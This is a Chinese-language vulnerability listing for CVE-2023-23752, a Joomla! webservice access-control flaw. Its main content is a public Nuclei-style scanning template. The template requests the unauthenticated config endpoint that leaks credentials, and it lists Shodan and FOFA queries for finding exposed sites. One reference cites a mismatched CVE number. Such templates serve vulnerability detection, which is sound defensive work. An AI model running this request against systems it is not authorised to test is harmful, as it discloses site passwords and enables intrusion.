CVE-2023-23752: Joomla! Webservice - Password Disclosure

日期: 2025-08-01 | 影响软件: Joomla | POC: 已公开

漏洞描述

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

PoC代码[已公开]

id: CVE-2023-23752

info:
  name: Joomla! Webservice - Password Disclosure
  author: badboycxcc,Sascha Brendel
  severity: medium
  description: |
    An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
  impact: |
    The vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts.
  remediation: Upgrade to Joomla! version 4.2.8 or later.
  reference:
    - https://unsafe.sh/go-149780.html
    - https://twitter.com/gov_hack/status/1626471960141238272/photo/1
    - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23552
    - https://github.com/20142995/pocsuite3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-23752
    epss-score: 0.94532
    epss-percentile: 1.00000
    cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: joomla
    product: joomla\!
    shodan-query:
      - html:"Joomla! - Open Source Content Management"
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve,cve2023,joomla,kev

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/index.php/v1/config/application?public=true'
      - '{{BaseURL}}/api/v1/config/application?public=true'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"links":'
          - '"attributes":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
          - 'application/vnd.api+json'
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100815804e09896fa2a1d076c1ea5e5b3fb84ab94dacbd9d5d50f3b3f15915be9ea022063819e56e80d55315102ff2065fdd9d6c4e62c736f1e2d6355dd13a8eb4b1e4b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐